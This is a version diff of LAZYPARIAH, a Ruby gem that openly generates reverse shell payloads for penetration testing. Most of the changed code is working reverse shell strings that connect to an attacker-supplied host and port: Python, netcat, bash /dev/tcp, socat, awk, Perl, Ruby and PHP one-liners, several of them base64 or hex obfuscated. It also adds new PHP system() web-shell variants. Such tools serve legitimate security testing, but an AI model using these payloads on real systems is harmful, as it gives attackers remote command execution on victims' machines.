lazypariah 0.4.0 → 1.0.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
-  data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
+  metadata.gz: 39fa66ebf06f26ea52ea9033989efa12ac2a517eaaecc9403c71f5cc6e2e0203
+  data.tar.gz: f8de654a384319b9b3f11cb8dd5d0c0618ed17086115144c92fee6b5e20a29c5
 SHA512:
-  metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
-  data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93
+  metadata.gz: c8ec9e1b3e0301e242ebe549db465103c72bd47b5b8799df416846143d6d61352f427e8dcb2b030dd03c4988558275bc2127b06df501f771ff989e20909be014
+  data.tar.gz: 82cd305608c676d0254d7bd9177cc2e227363fbfdbb5878628d82cc3adccef4719ad78eb06a4d6dbe5a06009fbe1431e591b57e09937d3fd9419922e90e8b5e2

data/bin/lazypariah

@@ -1,13 +1,13 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 0.4.0
+# Version: 1.0.0
 # Description:
 #	LAZYPARIAH is a simple tool for generating various reverse shell payloads
 #	on the fly. It is intended to be used only in authorised circumstances by
 #	qualified penetration testers, security researchers and red team professionals.
 #
-# Copyright (C) 2020 Peter Bruce Funnell
+# Copyright (C) 2020-2021 Peter Bruce Funnell
 #
 # This program is free software: you can redistribute it and/or modify it under the terms of the GNU
 # General Public License as published by the Free Software Foundation, either version 3 of the License,
@@ -29,35 +29,22 @@ require "stringio"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "0.4.0".freeze()
+PROGRAM_VERSION = "1.0.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
 PAYLOAD_LIST = [
 	"python",
-	"python3_c",
-	"python2_c",
 	"python_c",
-	"python3_b64",
-	"python2_b64",
 	"python_b64",
-	"python3_hex",
-	"python2_hex",
 	"python_hex",
 	"nc",
 	"nc_pipe",
-	"php_fd_3",
-	"php_fd_4",
-	"php_fd_5",
-	"php_fd_6",
-	"php_fd_3_c",
-	"php_fd_4_c",
-	"php_fd_5_c",
-	"php_fd_6_c",
-	"php_fd_3_tags",
-	"php_fd_4_tags",
-	"php_fd_5_tags",
-	"php_fd_6_tags",
+	"php_fd",
+	"php_fd_c",
+	"php_fd_tags",
+	"php_system_python_b64",
+	"php_system_python_hex",
 	"perl",
 	"perl_c",
 	"perl_b64",
@@ -103,7 +90,10 @@ option_parser = OptionParser.new do |options|
 	options.on("-h", "--help", "Display help text and exit.")
 	options.on("-l", "--license", "Display license information and exit.")
 	options.on("-u", "--url", "URL-encode the payload.")
-	options.on("-v", "--version", "Display version information and exit.\n\n")
+	options.on("-v", "--version", "Display version information and exit.")
+	options.on("-D INTEGER", "--fd INTEGER", "Specify the file descriptor used by the target for TCP. Required for certain payloads.")
+	options.on("-P INTEGER", "--pv INTEGER", "Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.")
+	options.on("-N", "--no-new-line", "Do not append a new-line character to the end of the payload.\n\n")
 end
 
 # Define port_check method for strings.
@@ -114,18 +104,22 @@ class String
 end
 
 # Define print_output.
-def print_output(s, url_encode=false)
+def print_output(s, url_encode=false, new_line=true)
 	if url_encode
 		print(ERB::Util.url_encode(s))
 	else
 		print(s)
 	end
+	if new_line
+		puts()
+	end
 end
 
 # Attempt to parse command line arguments.
 begin
 	arguments = Hash.new()
 	option_parser.parse!(into: arguments)
+
 	if arguments[:version]
 		prog_info(donation_info=false)
 		exit()
@@ -162,87 +156,81 @@ begin
 			puts("\nThe specified port was invalid. Please specify a port between 0 and 65535 (inclusive).\n\n")
 		else
 			url_encode = arguments[:url] ? true: false
+
+			# Get TCP file descriptor from command-line argument, if provided. This is required for some payloads (e.g. php_fd).
+			tcp_fd = arguments[:"fd"]
+			if tcp_fd and not tcp_fd.to_i().to_s() == tcp_fd
+				puts("Invalid file descriptor detected. When specifying a file descriptor via the command-line argument \"-D INTEGER\" or \"--fd INTEGER\", that file descriptor must be a valid integer (e.g. 3, 4, 5 or 6).")
+				exit()
+			end
+
+			# Get Python version from command-line argument, if provided. This is useful for some payloads (e.g. python_b64).
+			python_version = arguments[:"pv"]
+			if python_version and ((not python_version.to_i().to_s() == python_version) or (not ["2", "3"].include?(python_version)))
+				puts("The Python version specified for the payload was invalid. When specifying a Python version for a payload via the command-line argument \"-P INTEGER\" or \"--pv INTEGER\", that version must be equal to either \"2\" or \"3\".")
+				exit()
+			end
+
 			case ARGV[0]
 			when "python"
-				print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode)
-			when "python3_c"
-				print_output("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
-			when "python2_c"
-				print_output("python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+				print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "python_c"
-				print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
-			when "python3_b64"
-				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
-				print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
-			when "python3_hex"
-				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
-			when "python2_b64"
-				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
-				print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
-			when "python2_hex"
-				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
+				print_output("python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "python_b64"
 				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
-				print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
+				print_output("echo #{code} | base64 -d | python#{python_version}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "python_hex"
 				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
+				print_output("echo #{code} | xxd -p -r - | python#{python_version}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+			when "php_system_python_b64"
+				python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+				print_output("<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+			when "php_system_python_hex"
+				python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+				print_output("<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "nc"
-				print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
+				print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "nc_pipe"
-				print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
-			when "php_fd_3"
-				print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");", url_encode=url_encode)
-			when "php_fd_4"
-				print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");", url_encode=url_encode)
-			when "php_fd_5"
-				print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");", url_encode=url_encode)
-			when "php_fd_6"
-				print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");", url_encode=url_encode)
-			when "php_fd_3_c"
-				print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", url_encode=url_encode)
-			when "php_fd_4_c"
-				print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");'", url_encode=url_encode)
-			when "php_fd_5_c"
-				print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");'", url_encode=url_encode)
-			when "php_fd_6_c"
-				print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");'", url_encode=url_encode)
-			when "php_fd_3_tags"
-				print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");?>", url_encode=url_encode)
-			when "php_fd_4_tags"
-				print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");?>", url_encode=url_encode)
-			when "php_fd_5_tags"
-				print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
-			when "php_fd_6_tags"
-				print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
+				print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+			when "php_fd", "php_fd_c", "php_fd_tags"
+				if not tcp_fd
+					puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
+				else
+					case ARGV[0]
+					when "php_fd"
+						print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+					when "php_fd_c"
+						print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+					when "php_fd_tags"
+						print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+					end
+				end
 			when "perl"
-				print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
+				print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "perl_c"
-				print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
+				print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "perl_b64"
 				code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
-				print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
+				print_output("echo #{code} | base64 -d | perl", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "perl_hex"
 				code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
+				print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "ruby"
-				print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
+				print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "ruby_c"
-				print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
+				print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "ruby_b64"
 				code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
-				print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
+				print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "ruby_hex"
 				code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
+				print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "bash_tcp"
-				print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
+				print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "awk"
-				print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
+				print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "socat"
-				print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
+				print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 			when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
 				code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
 
@@ -255,10 +243,10 @@ begin
 					java_payload = f.read()
 					case ARGV[0]
 					when "java_class_binary"
-						print_output(java_payload)
+						print_output(java_payload, new_line=false)
 					when "java_class_b64"
 						java_payload_b64 = Base64.strict_encode64(java_payload)
-						print_output(java_payload_b64, url_encode=url_encode)
+						print_output(java_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 					when "java_class_gzip_b64"
 						sio = StringIO.new()
 						sio.binmode()
@@ -267,7 +255,7 @@ begin
 						gz.close()
 						java_payload_gzip = sio.string
 						java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
-						print_output(java_payload_gzip_b64, url_encode=url_encode)
+						print_output(java_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 					end
 				end
 
@@ -284,13 +272,13 @@ begin
 					binary_payload = f.read()
 					case ARGV[0]
 					when "c_binary"
-						print_output(binary_payload)
+						print_output(binary_payload, new_line=false)
 					when "c_binary_b64"
 						binary_payload_b64 = Base64.strict_encode64(binary_payload)
-						print_output(binary_payload_b64, url_encode=url_encode)
+						print_output(binary_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 					when "c_binary_hex"
 						binary_payload_hex = binary_payload.unpack("H*")[0]
-						print_output(binary_payload_hex)
+						print_output(binary_payload_hex, new_line=!arguments[:"no-new-line"])
 					when "c_binary_gzip"
 						sio = StringIO.new()
 						sio.binmode()
@@ -298,7 +286,7 @@ begin
 						gz.write(binary_payload)
 						gz.close()
 						binary_payload_gzip = sio.string
-						print_output(binary_payload_gzip)
+						print_output(binary_payload_gzip, new_line=false)
 					when "c_binary_gzip_b64"
 						sio = StringIO.new()
 						sio.binmode()
@@ -307,12 +295,12 @@ begin
 						gz.close()
 						binary_payload_gzip = sio.string
 						binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
-						print_output(binary_payload_gzip_b64, url_encode=url_encode)
+						print_output(binary_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
 					when "c_binary_gzip_hex"
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
-						gz.write(binary_payload)
+						gz.write(binary_payload, new_line=!arguments[:"no-new-line"])
 						gz.close()
 						binary_payload_gzip = sio.string
 						binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-  version: 0.4.0
+  version: 1.0.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-11-24 00:00:00.000000000 Z
+date: 2021-03-08 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
   on the fly. It is intended to be used only in authorised circumstances by qualified
@@ -44,7 +44,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 requirements:
 - A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
   and OpenJDK (for Java payloads).
-rubygems_version: 3.1.2
+rubygems_version: 3.2.5
 signing_key:
 specification_version: 4
 summary: A tool for generating reverse shell payloads on the fly.